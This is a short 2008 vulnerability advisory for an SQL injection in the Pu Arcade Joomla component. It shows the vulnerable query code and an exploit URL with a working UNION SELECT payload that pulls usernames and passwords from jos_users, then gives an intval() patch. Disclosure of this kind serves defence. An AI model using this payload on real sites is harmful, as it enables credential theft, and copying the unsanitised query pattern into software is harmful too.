Pu Arcade component for Joomla - SQL injection

2008-04-10T00:00:00
ID SECURITYVULNS:DOC:19614
Type securityvulns
Reporter Securityvulns
Modified 2008-04-10T00:00:00

Description

I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) .

SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for JOOMLA .

Author : MantiS

Vulnerable code :

function warningByGame($gid) { global $database;

    $query = &quot;SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM

__puarcade_games as g, #__puarcade_contentrating as c"

              . &quot; WHERE g.contentratingid = c.id&quot;
              . &quot; AND g.id = $gid&quot;;
    $database-&gt;setQuery&#40;$query&#41;;
    $cont = $database-&gt;loadObjectList&#40;&#41;;

Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gid=[SQL INJECTION]

Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns) .

Patch :

Place before "$query = "SELECT c.id......... " : $gid = intval($_GET['gid']); To force $gid variable conversion at an integer .